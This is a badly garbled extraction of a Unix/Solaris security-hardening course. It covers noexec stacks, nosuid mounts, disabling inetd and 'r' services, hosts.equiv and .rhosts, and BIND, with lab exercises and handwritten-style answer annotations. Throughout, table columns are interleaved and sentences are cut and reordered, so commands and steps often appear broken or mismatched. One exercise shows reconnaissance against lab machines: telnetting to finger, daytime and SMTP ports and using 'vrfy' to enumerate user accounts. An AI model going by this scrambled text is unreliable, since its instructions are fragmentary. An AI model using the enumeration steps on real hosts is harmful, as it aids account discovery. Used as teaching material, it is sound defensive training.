s:coredumpsize =set sy

to the /e
nsversio

 

 
Buffer Overflow 

Vulnerability Countermeasure 
A buffer overflow 
condition occurs when 
a user or process 
attempts to place more 
data into a buffer than 
was originally 
allocated.  This would 
normally cause a 
segmentation violation 
to occur, however, this 
type of behavior can be 
exploited to gain 
access, often root, to 
the target system. 
 

�1.  PREVENT the execution of arbitrary code in the data 

eck your vendor documentation for your version 
of Unix. 
NOTE 2:  Software patches are you best defense against 
buffer overflows and poor programming. 
NOTE 3:  Stack settings currently fail to work on the X86 
architecture (PC's running Unix). 

n and 

buffer. 
 

For Solaris, to prevent the execution of instructions in 
the data stack, add the following entries to the 
/etc/system file. 
set noexec_user_stack=1 
set noexec_user_stacklog=1 
Restart the system by typing:  init 6 

NOTE 1: Ch

 
For more information, see “Smashing the Stack for Fu
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Profit” at:  http://www.2600.com/phrack/p49-14.html 
 
*** Linux systems**** 
Buffer overflow events can be prevented by compiling 

programs with the StackGuard compiler available at:  
http://www.immunix.org.  This compiler places other 
values called "canaries" on the stack area that are 
overwritten by buffer overflow attacks.  An overwritten 
canary results in immediate program termination. 

 
 
  Kernel 

Vulnerability Countermeasure 
The kernel, or heart of 
the U  
the operating system.  

fied 

�1.  ENSURE that the kernel (may be called  /vmunix, 
/unix, or /kernel) is owned by root, has group set to 0 and NIX system, is

It should not modi
or recompiled unless 
by root.  Modifications 
could affect computer 
input/output systems 
and filesystem security. 

permissions set to 644 or more restrictive. 
 

 
 
External file systems/devices 

Vulnerability Countermeasure 
By default, most file 
systems are mounted 
with Read/Write 
permissions for 
everyone, as well as 
allowing the ability to 
create SUID files.  To 
protect your system, 
file systems should be 
mounted as Read-Only, 
and no SUID. 

DO be VERY careful when using the mountall 
or umountall commands. 

 
�2.  Ch /etc/export; or /etc/dfstab for entries 
without the nosuid flag. 

• Example:  /dev/hdc  /mnt/cdrom   iso9660   

�1.  MOUNT  file systems non-setuid and read-only where 
practical. 

NOTE: 

• Newer versions of Unix utilize volume managers and 
automatic removable media mounting scenarios.  
Check  volume manager or rmmount configuration 
files  for nosuid entries.  Normally the /etc/vold.conf 
and /etc/rmmount.conf. 

eck the /etc/fstab; 

ro,user,noauto,nosuid 
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Practical Exercise SAS-7D 
EXERCISE D 

 
 

The purpose of this PE is to learn some of the basic configuration settings and default settings of 
the Unix operating system as they relate to security.  Commands to type are written in bold.  Only 
type what is in bold.  The ‸ sym
 
1.  Be logged in as the root adm
terminal window.  Your deskto
 
2.  Login banners are a requirement fo vey the identity of 
the computer system, the fact that mon  is permission to be 
monitored, and any regulation governing the system use or the security of the system.   We are 
going to create a couple of banners tha  into a system.  These are 
sometimes referred to as "command line" banners. 
 
3.  Create a login banner for comm
 
4.  Enter the following text:  is  th

Save and close the edit
 

5.  Enter at the prompt:  telnet ‸ localh
 
6.  Do you see your banner? _____________________________ 

To get out of telnet  type:  ^D    
 

7.  Now we'll create a specialized banner for telnet sessions only.  dtpad ‸ /etc/default/telnetd 
 
8.  Enter the following text:    B
 
9.  Hit enter, save and close the
 
10. At the prompt type: telnet 
 
11. Do you see both banners? __________________________ 
 
12.  To get out of telnet type:  ^D  
 
13.   

3.  Next, we'll look at the problems concern tem  
Core dumps can have clear text passwords and keys in them.  Hackers look for core dump files 
(files with “core” in the name).  Password hashes and ough doing this.  Solaris 

bol indicates where you put in a space.   

inistrator.  Make sure you are in the Bourne shell and using a 
p sho E. uld be CD

r DoD systems.  A good banner will con
itoring is taking place, use of the system

t a user will see when telneting

and line logins   dtpad ‸ /etc/issue 

is ‸ my ‸ banner? ‸
or 

ost 

ANNER=“Hey  Einstein, ” ‸  ‸  

 editor 

‸ localhost 

1 ing core dumps.  Core files can fill up a file sys

 IP's are gained thr
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has a utility called (coreadm).  is also a 
/etc/coreadm.conf file.   
 
14.  coreadm   -  shows dump process settings  (new systems create dumps with mode 600.  They 
will either make them global coredumps or by process.  Let's check our system settings.  To see 
dump process settings, type:  coreadm 
 
 
15.  dumpadm  -  shows your dump configuration.  To see your dump configuration, 
type:  dumpadm 
 
16.  A big part of the core dum  problem stems around content.  By eliminating content, we can 
eliminate that part of the problem.  To prevent any process from creating a core dump, modify the 
/etc/system file.  The /etc/syste modify kernel activity without recompiling the 
kernel.  Type:  dtpad ‸ /etc/system 
 
17.  Go to the bottom of the file an n
Hit enter, save and close the editor. 
 
18.  Now lets deal with the issue of buffer overflows.  Buffer overflows are the most common 
attacks you'll see these days.  They take advantag ng.  Once again, we'll use the 
/etc/system file to modify our s  dtpad ‸/etc/system 
 
19.  Go to the bottom of the file, below try and add the following entries on 
two new lines of the /etc/system
                        set ‸noexec_user_sta
                        set ‸ noexec_user_stacklog=1 

lose the file without saving.  The PC version of 
d to perform this function.  If you are using 

esigned 

disables ump 
ttempt m the 
fix cou  properly.  
e able f 

ack of a
arameters, a

the first item

 see if our mounted drives are being mounted with the "nosuid" option.   It 
re out if automounting is occurring.  If you insert a CD into the CDROM 
er crea ounting is happening.  Check the 

mon to see which file is responsible for handling the loading of the various 
 at the prompt:  cat‸ /etc/vold.conf 

 the removab  media mount program (rmmount) is called on to handle mounted 
_______

It will allow you to manage coredumps selectively.  There 

p

m file allows us to 

d e ter on the last line: set ‸ sys:coredumpsize=0  

e of bad programmi
ystems behavior.  Type at the prompt: 

 the coredumpsize en
 file.   

ck=1 

NOTE:  If you are using a PC version of Unix, c
Unix does not have the program variable require
hardware specifically d
 
20.  The stack =1 entry 
on any buffer overflow a
stack to be logged.  This 
Some programs need to b
memory used to keep tr
addresses, passed p
The last item added is 
 
21.  Now we'll check to
is normally easy to figu
drive and the file manag
Volume Manager dae
mounted volumes.  Type
Do you see where
media?  ___________

for Unix, save and exit the editor. 

 the execution of code directly on the stack by forcing a core d
.  The second command causes any attempt to run code fro
ld possibly stop some legitimate programs from running

 to execute code in the stack.  The stack is a reserved area o
 program’s internal operations, including functions’ return 
nd so on.  A stack is usually a LILO (last in/last out) data structure.  

 used. 

tes a file window for you, autom

le
_____________________ 
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conf file:  

3.  Can you locate the “nosuid” se
supported? ____________ n fs) 
 
24.  END OF PE 
 
 

22.  Check the rmmount.
 

cat ‸ /etc/rmmount.conf 

tting?  ____________________  What file systems are 
________________ (file systems usuall

2
___ y end i
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ercise SAS 7E 

 Patch P

elp you identify the em and how 
 install new ones.  This PE also will help you identify the patches that have been placed on your 

ystem and how to update your system with additional patches.  Commands to run are identified in 
bold print. 
 

1. Log in as root and open a t  in CDE (common desktop environment) 
2. Use the package information command:  pkginfo 
3. You should see a long scrolling oaded to your system. 
4. Pick one and look at its ndividual information:  pkginfo –l SUNWdtdst 
5. This command should d p age.  Each 

individual package has its own pkginfo file that can be queried for information. 
6. Take a look at the patches loaded on your system by using both the showrev and patchadd 

commands 
7. showrev –p 
8. patchadd –p 
9. both commands show that no patches have been loaded to this Solaris 9 base system 
10. Insert the cdrom the instructor nt to your system.  Open up the 

file manager if cdrom content does not display on the desktop.  (right click on the desktop, 
select files, and then fi m

11. The cdrom will mount 
12. Access the cdrom:  cd /cdrom/cdrom0 
13. List the contents:  ls 
14. Do you see the file contents.  Some are patches and some are software packages.  All are 

compressed with some rt
15. The 114134_0.zip and 
16. Make the default patchi
17. Copy the patches over t
 cp /cdrom/cdrom0/114* /var/spool/patch 
18. Change over to the patch direc
19. Unzip the patches 
20. unzip 114134_0.zip 
21. unzip 114137_0.zip 
22. Install the patches 
23. patchadd 114134-01 
24. patchadd 114137-04 
25. You should see the patches load after each patchadd command. 
26. run either patchadd –p  lled patches.   You 

should see the two patches you
27. Go back to the root hom
28. Double check that you are in th
29. List out the cdrom components :  ls /cdrom/cdrom0 
30. Now install some packages to enable the Solaris Jump Start imaging program.  First we 

need to copy the packa lt package directory. 
31. cp /cdrom/cdrom0/jet

Practical Ex
 
 Installing Packages and
 
This PE will h

es ractical Exercise 

software packages that have been loaded to your syst
to
s

erminal window

 list of packages that are l
 i
is lay the information about the desktop application pack

gives you.  It will automou

le anager) 
as either CDROM0 or New 

so  of encryption. 
114137_0.zip are patches for mail and sendmail 
ng directory:  mkdir /var/spool/patch 
o the default directory: 

tory:  cd /var/spool/patch 

 or showrev –p to see the current list of insta
 just loaded. 

e directory:  cd 
e / directory:  pwd 

ge to the defau
pkg.bz2 /var/spool/pkg 
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32. Change to the /var/spool/pk d uncompress the file 
33. cd /var/spool/pkg 

ool/pkg/jetpkg.bz2 
ee if the unzip was successful

kage:  pkga
ages will d

all questions
e info co m
ackages u

SAN, Je

42. Now lets upgrade our overall e
43. cp /cdrom/cdrom0/sol
44. Now unzip the package. 
45. unzip /var/spool/pkg/s _
46. This creates a directory of 
47. Lets view the packages ava
48. ls /var/spool/pkg/sol-9-x86-crypto/Encryption_9/i386/Packages 
49. You’ll see a list of 3 packages
50. Install the packages 
51. pkgadd –d /var/spool/pkg/sol ges 
52. You see a choice of 3, hit enter to select all 3. 
53. Answer yes to each prompt as you install all 3 
54. When you’ve installed all 3, hit the “q” key to stop the install loop 
55. Type pkginfo to find out what we installed:  pkginfo 
56. You should see SUNWcrman(Solaris Crypto Man Pages), SUNWcry(Crypt utilities), and 

SUNWcryr(Solaris Root Crypto) have been added to the package list. 
57. You have just installed software updates to improve current encryption levels and to enable 

stronger encryption in programs such as IPSEC. 
58. Use the cd command to
59. End of PE 
 

 
 
 
 

g directory an

34. bunzip2 /var/sp
3 o s5. Do a listing t :  ls 
36. Add the pac
37. A list of pack
38. Answer yes to 
39. run the packag
40. Check for the p

JetFLASH, Jet
41. Congratulations you have installed software 

dd –d /var/spool/pkg/jetpkg 
isplay, hit enter to accept all. 

. 
and:  pkginfo m

 yo  just added.  You should see packages like JetEXPLO, 
tSDS, and JetVTS 

ncryption package 
_9_x8.zip /var/spool/pkg 

ol 9_x8.zip 
sol-9-x86-crypto 
ilable: 

 that deal with encryption. 

-9-x86-crypto/Encryption_9/i386/Packa

 get back to the / directory:  cd 
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nt 4 
nternet ecurity 

   

ommand used for? 

rexecd return for invalid usernames and invalid passwords? 

portant differences between telnet and rlogin?   
 

? 

user? 

ecurity problem with trusted hosts? 

e list o

e list of truste

 

Reading Assignme
Practical UNIX and I
Day 3 
 
Pages 378 - 381

 S

 
 
1. What is the rexec c
 
 
 
 
2. What messages does 
 
 
 
 
3. What are the 2 im

 
 
 
4. Explain a trusted host
 
 
 
 
5. Explain a trusted 
 
 
 
 
6. What is the main s
 
 
 
 
7. Which file contains th
 
 
 
 
8. Which file contains th

f trusted hosts/users for the system? 

d hosts/users for each user? 



PRACTICAL EXERCISES 
C2 PROTECT/SYSTEM ADMINISTRATOR AND NETWORK MANAGER SECURITY 

 

1-202 

urity and manag at are some of the replacements for ftp? 

stablished are available within ftp? 

ence betw

12. What is a ftp bounce attack? 
 
 
 
Pages 576 - 578 
 
 
3.What four main restrictions go into effect when a user is placed in a restricted shell? 

5. How can you restrict the ability of users to login to the root account from any terminal other 

er from su to the root account? 
 

 

 
Pages 331 - 337 
9. As ftp has some sec
 
 
 
10. Once a user has e
 

ement problems, wh

 an ftp connection, how many commands 

 
 
11. Explain the differ
 
 
 

een passive ftp and active ftp? 

1
 
 
 
 
 
 
Pages 591 - 593 
 
 
14. List 2 additional method of protecting the root account? 
 
 
 
1
than the console? 
 
 
 
16. Does the above restriction prevent a us
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NIX Network Security U
Turn off unnecessary services  

Vulnerability Countermeasure 
Unnecessary services �1.   Services often runnin
leave a system open to 

ck in  a 
varie

e 
 

g by default 
7/tcp - echo 
11/tcp - systat 
13/tcp - daytime 

lnet 

3/tcp - whois 

69/udp - tftp 

111/tcp – portmapper/rcpbind 
139/tcp - netbios 
512/tcp - rexec 

(1)Only root can bind to a port below 1024 

oming from a port less 
1024 on the remote machine is from a program that is 

run by root. 

(5)Attempts to connect to another machine at a low numbered 
port are taken to be from the official daemon that is possibly 
requesting a username and password and not some rogue 
server created by a clever user on that machine.  This also 
applies to authentication services like ident/auth port, which 
is used to provide the username associated with an existing 
connection. 
(6)rsh and ssh can be configured to allow certain users to log 
in without a password from specified systems.  Since the 
connection is coming from a privileged port, the server can 
trust that the client username supplied is accurate. 
 

�2  Protect TCP Sequence attacks

outside atta
ty of ways.  A 

system should only 
offer services that ar
necessary for mission
performance.   
 

19/tcp - chargen 
21/tcp - ftp 
23/tcp - te
25/tcp - smtp 
37/tcp - time 
42/tcp - nameserver 
4
53/tcp/udp - DNS lookup/zone 

79/tcp - finger 
80/tcp – http 

513/tcp - rlogin 
514/tcp - rsh 
 

(2)Binding is when a service connects to and begins 
listening at a port. 
(3)Machines trust that a connection c
than 

(4)Port numbers are used by some protocols as a means of 
authentication. 

 by modifying the 
/etc/default/inetinit  to read TCP_STRONG_ISS=2 

Kelly Larsen
yes
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�3  To stop IP forwarding, creat the file called /etc/notrouter      
(no content) 
 
�4  Solaris can detect promiscuous mode with the public 

iscuous status. 
 

list of these ports. 

domain software “ifstatus”.  It will return a machines 
prom

�5  DA procedural guidance for Unix systems, DA msg 
050951Z MAR 99, requires all high numbered ports with 
known vulnerabilities to be disabled.  ACERT maintains a 

 
/etc/inetd.conf  

Vulnerability Countermeasure 
 

 is best to avoid 
telnet, ftp, tftp, http, 
smtp, snmp, udp, and 

Network services – IAW HQ DA SAIS-IAS message DTG 
R 050951Z MAR 99, and as stated in a number of previous 
alerts, unused or unnecessary ports and services should 
not be active.  Disable and/or disable at the network layer 

ssible all unused and unnecessary ports and services, 
rpc, tftp, gopher, smtp, http, finger, netstat, etc. Conduct 
ssessments to determine if that port must remain open. 

OTE 1: Some system services, specified in system startup 
files, WILL NOT be disabled simply by commenting them 

 The location of the inetd.conf file will vary 
between Unix/Linux flavors.  It is oftened linked to the /etc 

ces that you do not need to operate.  
To do this, comment out ALL services by placing a “#” at the 
beginning of each line. Then enable the ones you NEED by 

s 

BSD commands

It

any “r” commands, as 
they have been major 

if po
e.g., 

sources of insecurities. risk a
 N

out in the /etc/inetd.conf file. 
NOTE 2: 

directory and it will be referred to as "/etc/inetd.conf" in this 
document. 
 
�1.  DISABLE any servi

removing the “#” from the beginning of the line. For change
to take effect, you need to restart the  process.  inetd

Restart inetd  
  

#ps –aux | grep inetd  
#kill –HUP <inetd-PID>  
SVR4 commands  
#ps –ef | grep inetd 
#kill –HUP <inetd-PID>  

 
If the above commands do not work, then do this: 

For some systems (including AIX), these commands are not 
sufficient. Refer to vendor documentation for more 
information. 

Kelly Larsen
yes


Kelly Larsen
machine name, protocol, OS version
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#ps –ef | grep inetd 

 
NOTE:  If you do not need ANY

#kill –9 PID <inetd-PID> 
#inetd –s 

 services running, prevent 

of the startup script in the /etc/rc2.d directory.  This is 

asis to verify 
that unnecessary services have been disabled. 

�2.  ENSURE that the permissions on this file are set to 600.  
�3.  ENSURE that the owner is root. 

 

• ADD the rpc.mountd and nfsd daemons to the 
/etc/inetd.conf.  This ensures the Internet daemon’s 

 
• START /etc/inetd.conf with logging enabled 

Add – t option to inetd command line 
/usr/sbin/inetd –s –t & 
#ps –ef | grep inetd 
#kill (inetd PID)  

#inetd -s -t 

on. Options for inetd include:  

   -t : instructs inetd to trace the incoming connections for all 
of its TCP services. It does this by logging the 

ber, along with 
slog.  UDP 

services cannot be traced. 
   -r : allows inetd to detect and then suspend 'broken' 

connectionless datagram services servers, i.e. UDP. 

Unix from launching the inetd by commenting out the last line 
S72inetsvc 

the line that specifies inetd -s. 
Examine your /etc/inetd.conf file on a routine b

 

 

#ls –l /etc/inetd.conf  
#chmod 600 /etc/inetd.conf  
#chown root /etc/inetd.conf

 

ability to limit client hosts but may cause some 
commands like showmount to cease functioning. 

 
Edit /etc/init.d/inetsvc 

 
inetd - Internet services daem
   -d : runs inetd in the foreground and enables debugging 
output 
   -s : allows you to run inetd 'stand-alone,' outside the Service 
Access Facility 

client's IP address and TCP port num
the name of the service, using the sy

 
/etc/services  

Vulnerability Countermeasure 

Kelly Larsen
date and time on machine

Kelly Larsen
who was logged on.  Normally this will be root

Kelly Larsen
machine name, sendmail version, date/time
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This fil
service
what p
disabled services in 

ou should disable the 
me service in

/etc/services file. 

the /etc/inetd.conf. 
• IAW HQ DA SAIS-IAS message DTG R 050951Z 

MAR 99, and as stated in a number of previous alerts, 
unused or unnecessary ports and services should not 

twork layer 
if possible all unused and unnecessary ports and 

tftp, gopher, smtp, http, finger, 
netstat, etc. Conduct risk assessments to determine if 

 
#cat /etc/inetd.conf 
#vi /etc/services 

• Place a # symbol at the start of each line, for the 

• Save the /etc/services.  No process restarting or 
rebooting is required.  This file acts as a 
database which is referred to as network service 
requests are received. 

�2.  ENSURE that the permissions on this file are set to 440.  
 the owner is root. 

 

d 440 /etc/services 
#chown root /etc/services 

e identifies what 
 is listening on 
ort. If you have 

�1.  COMMENT out any ports of services that you want 
disabled.  This should match the services commented out in 

/etc/inetd.conf, then 
y
sa  the be active.  Disable and/or disable at the ne

services, e.g., rpc, 

that port must remain open. 

port you wish to disable. 

�3.  ENSURE that

#ls –l /etc/services 
#chmo

 
 
Remo es) te Commands ("R" servic

Vulnerability Countermeasure 
The "R" services were 
developed by Berkeley 
to provide seamless 
authentication between 
trusted hosts and users.  
The remote commands 
can allow 
users/attackers to 
circumvent password 
authentication via 
trusts.  Authentication 
is based on IP address, 
TCP port, and client 
username.    Remote 
shell (in.rshd) port 514 
and remote login 
(in.rlogind) port 513 

�1. USE the Secure Shell (ssh) program to replace rlogin 
(remote login) and rsh (remote shell).  Secure shell is a 
suite of utilities which utilize port 22 to set up  public 
key encrypted remote access.  It packages with a 
secure shell daemon (sshd) which handles all the 
connections, a secure shell program (ssh), a secure 
copy program (scp), a secure login program (slogin), 
and a secure ftp program (sftp). 
 

NOTE 1:  Secure Shell is an ACERT recommended 
commercial product and can be obtained at:  
http://www.ssh.org 
 
There is also a free version of SSH. It can be obtained at: 
http://www.openssh.com/ 
 
NOTE 2:  Use more secure versions (like Wietse Venema’s) 

Kelly Larsen
port 7 would repeat all the data sent to it.  It would use large amounts of cpu and disk time.

Kelly Larsen
13, 25

Kelly Larsen
79

Kelly Larsen
7

Kelly Larsen
19

Kelly Larsen
13 , 25

Kelly Larsen
25

Kelly Larsen
21, 25

Kelly Larsen
21
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are the more dangerous 
remote services. 
 

of the “r” commands for cases where there is a specific 
need. These versions can be configured to consult only 
/etc/hosts.equiv and not $HOME/.rhosts. There is also 
an option to disable the use of wildcards (‘+’). 

NOTE 3:  To stop the threat of remote services, comment 
them out in the inetd.conf, comment out the port in 
/etc/services (rlogin uses port 513 and rsh uses port 514), 
or rename the associated daemon file. 

 
NOTE 4:  REXEC is oftened confused with other "r" 
services.  It runs on TCP port 512.  Many Unix distributions 
do not ship with REXEC.  REXEC uses standard username 
and password authentication.  All data is sent in clear text. 

 
 
REXEC  (remote execute) 

Vulnerability Countermeasure 
REXEC runs on port �1. Disable REXEC.  If client applications rely upon it, 
512 an
usernam assword 

attempts may go 
unnoticed as the rexecd 
per

All communications 
are unencrypted. 

 
re 

Shell (ssh)  to tunnel the program.  SSH provides 
remote terminal access 

commercial product and can be obtained at: 
http://www.ssh.org

d uses standard 
e and p

figure out a migration path away and then disable it. 

authentication.  Brute • If you can not disable REXEC, consider using Secu
force 

forms poor logging.   •  
 NOTE 1:  Secure Shell is an ACERT recommended 

 
There is no access 
control built in to 
r  exec. 
 

 
 
There is also a free version of SSH. It can be obtained at: 
http://www.openssh.com/ 
 

 
/etc/hosts.equiv  

Vulnerability Countermeasure 
The /etc/hosts.equiv 
file explicitly or 

�1.  – IAW HQ DA SAIS
eliminate all .rhosts+, .rhosts 

implicitly trusts other 
hosts.  Since trust is 
transitive, you may be 

ontrol.  Be very 
areful when 

lis
emote users can gain 

ccess to the system.  

-IAS message DTG R 050951Z MAR 99, 
++, or host.equiv

trusting hosts not under 
your c
c
estab hing trust.  
R
unauthorized root 
a

 to external hosts (external 
to the network) 
   
 
• DETERMINE if the file /etc/hosts.equiv is required. If 

you are running certain “r” commands, such as rlogin, 
rsh, and rcp, this file allows other hosts to be trusted by 

. Programs such as rlogin can then be used to 
e same account name on your machine from a 

hout supplying a password.  

#ls –l /etc/hosts.equiv 

your system
log on to th
trusted machine wit
 

Kelly Larsen
25

Kelly Larsen
7, 19
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Under normal 
circumstances, you 
should have no use for 

is file and it should 
m

 
 

#rm /etc/hosts.equiv 
 

• DO NOT specify a username with a specific host.  This 
allows that user listed in the /etc/hosts.equiv to log into th

be re oved. the local system as any

 

 user o
 

n the local machine!! 

• ENSURE that you list only a small number of TRUSTED 
hosts. Remember that trust is transitive.  

• ONLY trust hosts within your network or under your 
management. 

s.equiv 
 
• ENSURE that you use fully qualified hostnames i.e., 

hostname.domainname.  
 
• ENSURE that you DO NOT have a ‘+’ entry by itself 

anywhere in the file as this will possibly allow users on 
any host to access your system.  

 
#more /etc/hosts.equiv 

 
• ENSURE that you do not use ‘!’ or ‘#’ in this file.  
NOTE:  There are no comment characters for this file. 
 

#more /etc/hosts.equiv 
 
• ENSURE that the first character of the file is not ‘-‘.  
NOTE: The presence of a '-' as the first character in 
/etc/hosts.equiv, /etc/hosts.lpd and .rhosts files may allow 
unauthorized access to the system.    
 

#more /etc/hosts.equiv 
 

Refer to the CERT advisory CA-91.12.  
http://www.cert.org/advisories/CA-

 
#more /etc/host

91.12.Trusted.Hosts.Configuration.VULNERABILIT
Y.html 

 
• ENSURE that the permissions are set to 600.  
• ENSURE that the owner is set to root.  

#ls –l /etc/hosts.equiv 
If the file exits: 

#chmod 600 /etc/hosts.equiv 
#chown root /etc/hosts.equiv 
 
 
CHECK it again after each patch or operating system 

Kelly
denied because no access to iprb0 (network adapter)

Kelly
lrwxrwxrwx;  it is a link

Kelly
crw-------

Kelly
yes
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installation. 
 
$HOME/.rhosts  

Vulnerability Countermeasure 
The .rhosts file is 
potentially a greater 

curity risk than the se
/etc/hosts.equiv, as 
one can be created by 
each user. 
 

�1.   IAW HQ DA SAIS-IAS message DTG R 050951Z 
MAR 99, eliminate all rhost+, rhost ++, o
external hosts (external to the network). 

r host.equiv to 

of, and delete $HOME/.rhosts files. Users should be 
hat you regularly perform this type of audit, 

as directed by policy. 

 
RT advisory CA-91.12. 

http://www.cert.org/advisories/CA-

 
• ENSURE that no user has a .rhosts file in their home 

directory.  
To check: 
#find / -name .rhosts –print 

#rm –r $HOME/.rhosts 
 
• Use CRON to periodically check for, report the contents 

made aware t

 
To see if check is being made for .rhosts  
#more /usr/spool/cron/crontabs/* 
 

Add or modify an existing cron job. See crontab manual 
page. 

Refer to the CE

91.12.Trusted.Hosts.Configuration.VULNERABILITY.html 
 

t the /etc/pam.conf file by commenting out the lines 
 and rlogin that contain reference to 

his will allow the login function to 

NOTE  Unlike /etc/hosts.equiv, .rhosts allow for root login.   

�2.  Edi
for rsh
pam_rhosts_auth.so.1.  T
skip its check for .rhosts files. 
 

 
 
 
Remote Procedure Call (RPC)  

Vulnerability Countermeasure 
RPC was originally 
developed by Sun 

�1.  DISABLE any RPC services that you do not need, such 
as rexd, rwall, rwho, rusers, rstat, rpc.ttdbservd, 

Microsystems, but it 
as been widely ported 

rpc.statd, rpc.cmsd,
sadmin, etc.  To do this, comment out h

to other versions of 
Unix.  It is a 
mechanism commonly 

placing a “#” at the beginning of each corresponding line of 
the /etc/inetd.conf file.  
 

 rpcgen, kcms_server, sprayd, 
ALL services by 
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sed to simplify 

networked applications, 

#more /etc/inetd.conf 

Restart inetd  

u
development of #vi /etc/inetd.conf  

in particular NFS and 
NIS. However, RPC 
uses very weak 
authentication. 
Under the standard 

PC authentication 

 

R
mechanism, a given 
RPC service will only 
respond to requests 
from a certain set of 

ser IDs. However, the u
remote server relies on 
the client to 
authenticate the user 
IDs being sent in the 
request. 
Samba (SMB) 

Vulnerability Countermeasure 
SMB is the Microsoft �1.  ENSURE that Samba has been re
file and print sharing server (if install
protocol. Samba makes #find / -name samba
a Unix server look like 
n NT server by 

NOTE.  Samba loads NetBios to your Un
 a

enabling it to run SMB. 
ulnerabilities have 

�2.  A serious security hole has been di
all versions of Samba.  Edit the smV

been discovered in all 
ersions of Samba, 

file and rep
v
especially for Linux 
running Intel platforms. 
Exploits may allow 
unauthorized remote 
users to obtain root 
access.  

moved from your 
ed and unnecessary).   

 (-print as required) 
ix computer. 

scovered that effects 
b.conf configuration 

lace all occurances of the macro "%m" .  
Replace %m with %I . 

 
Domain Name Service  

Vulnerability Countermeasure 
DNS is one of the few 
ervices that is almost

�1.  DISABLE and REMOVE BIND on any system that is 
s  

organization’s Internet 
perimeter network.  
Thus, a flaw in BIND 
will almost surely 

not being used as a DNS server.   

y to start in.named in the 
file: 
/etc/rc2.d/S72inetsvc 
kill in.named process and remove any named.xfer 
processes 

always required and 
running on an 

 
In Solaris, comment entr
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IND attack, intruders 
erased the system logs, 
and installed tools to 

ain administrative 

 
ANS rates unpatched 

 
�2.  ENSURE that the version of BIND you are using is 
current and patched for security-related flaws.  Bind has had 
12 security advisories in the last 4 years. 

 group. 
�4.  Configure BIND to disallow zone transfers except to 
authorized servers. 

orking DNS 
is often a forgotten DNS 

 available at:  

result in a remote 
compromise.  In a 
typical example of a 

#ps –ef | grep in.named; ps –ef | grep xfer 
#kill –9 (in.named PID) 
#kill –9 (xfer PID) 

B

g
access.  �3.  Don't run BIND as root.  Create a new user and

S
BIND servers as the 

umber one security 
�5.  Do you check your DNS logs regularly.  A w

n
problem on the 
Internet. 

 
It is
https://www.acert.belvoir.army.mil/ACERTmain.htm  
 
References: 
http://www.cert.org/advisories/CA-99-14-bind.html 
http://www.cert.org/advisories/CA-98.05.bind_problems.html 
http://www.cert.org/summaries/CS-98.04.html 

 

 

Practical Exercise SAS 8A 
XERCISE A E

 
This PE will familiarize you with identifying remote connections, disconnecting remote session

tifying ports and service
s, 

en s that are open and some of the dangers of leaving unnecessary ports 
e what is 

ommand 
ands will 

u "telnet" to various ports and observe some of the disadvantages of leaving 
 open when certain services are running on them. 

 
2.  Login to your Solaris workstation as root.  Make sure that the desktop you are using is the 
Common Desktop Environment (CDE).   
 
.  Break down into groups of two.   

 
4.  Each partner should telnet to their partner's workstation:  # telnet‸(partner ip) 

(example:   #telnet 147.51.217.151)  Were you greeted by your partner's banner?  
              

id
open and unnecessary services running.  Commands to type are written in bold.  Only typ
in bold.  The ‸ symbol indicates where you put in a space.  The # symbol represents the c
prompt.  Not all commands in this PE will be typed on a command prompt.  Some comm
be typed within a TCP session. 
 
1.  This PE will have yo
them

3
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              ____________________ 

5.  Login as labuser2 with a password of student2.   

.  Change to root with su and root's password.  # su‸root 

 

 
6
 
netstat  

Vulnerability Countermeasure 
The netstat daemon 
will report network 

netstat displays the contents of certain network-related data 
structures in various formats, depending on the options 

connections, routing selected. 

disabled in the /etc/inetd.conf file. 
 
#chmod 500 /usr/bin/netstat 

information, and 
statistics. 

�1.  ENSURE that permissions for netstat are set to 500 
�2.  ENSURE that the netstat daemon (netstatd) has been 

 
7.  Use the netstat command to determine the connections on your partners computer.  Remember, 

is will show all of the tcp protocol 

.  You t of ports listening or in use.  Find the line where telnet and your IP or 
machin d.  One is the connection from you.  The other is your partner connecting to 
you. 
 
9.  Find the process that is your connection to your partner.  The in.telnetd daemon makes the 

 telnet connection you are using to 
onnec

you are viewing your partner's computer connections.  Th
activity. 
             #netstat‸-a‸-P‸tcp 
 
8  should see a lo

e name are liste

inbound connection possible.  Search for processes that involve it.  
             # ps‸-ef‸|‸grep‸in.telnetd  

 
10.  The first number listed, from the left, is the process id of the
c t to your partner.  Kill this process.  #kill‸-9‸(PID)         (example:  # kill -9 488) 
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 get notification that your connection was disconnected by the foreign host?  
 
       _______________________________
 

2.  Check to see if the process still exists.  It should be gone from both machines.   

 
e.  The connection you will be viewing is that of 

our own workstation.  You are no longer connected to your partner.        #netstat‸-a‸-P‸tcp 

ould be gone or in a TIME_WAIT status.  A TIME_WAIT status would 
dicate that your tcp connection ended unnaturally.  Your computer is still waiting for the 

9, you forced the 
onnection to close on your partners machine.  No command was ever sent back to your machine.  

f syntax will show you 

 #netstat‸-an‸>‸file2 
 
 

6.  Lo
IME_WAIT status.  It should be gone. 

 
17.  Look at the IPv6 TCP section and notice the services on the left with the corresponding port 
number near the center of the line.  There are services open expecting a connection from the 
outside.  Notice the listening status.  If you browse the entire list you'll see the UDP: IPv4, UDP:  
IPv6,  TCP:  IPv4, and TCP:  IPv6 ports and services.   
 
 
18.  Go look at what can be learned from the FTP port of 21.  Type:  # telnet‸localhost‸21 
 Solaris 9 users will also type:  USER‸ labuser1 (hit enter) PASS‸ student1 (hit enter) 
 
 a.  What information does the system give you once you connect to port 21? 
 
 __________________________________________________________________ 
 
 b.  Type:  help 
 

1.  You should see a bunch of commands that are not meant for public consumption.  
Manipulation of these commands enables hackers to take over systems. 

 
 c.  Type:  quit  

 
11.  Did you just

_   You just disconnected yourself. 

1
               # ps‸-ef‸|‸grep‸in.telnetd 

13.  Use netstat to see if the connection is still ther
y
 
14.  The connections sh
in
command to close the connection.  It will time out naturally.  When you used kill -
c
The connection was left open on your machine. 
 
15.  Check to see what ports and services are open.  The following set o
ervices and ports that are open on your computer.  Do the following steps in order. s

  #netstat‸-a‸ >‸file1 
 

 #sdiff‸file1‸file2 

ok for your connection to your partner.  It should no longer be listed as being in a 1
T

Kelly Larsen
no
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ed by going to port 13.  Type:  # telnet‸localhost‸13 

n't really let you connect but it will give you some information.  What did you 

a.  Type:  # telnet‸localhost‸79 
 
b.  Hit enter twice.  What did you learn? 

 

port for sendmail and works similar.   Type:  # telnet‸localhost‸25 
 

b.  Type:  help 

ds that you could use to manipulate email. 
 
 c.  Type: vrfy‸labuser1 

 vrfy labuser3
 

f.  You'll notice that in steps c and d, you found out about labuser 1 and 2's email accounts.  
Step e indicated that there wasn't a labuser3 on the system.  This is one of the ways hackers 

g.  Type:  quit 

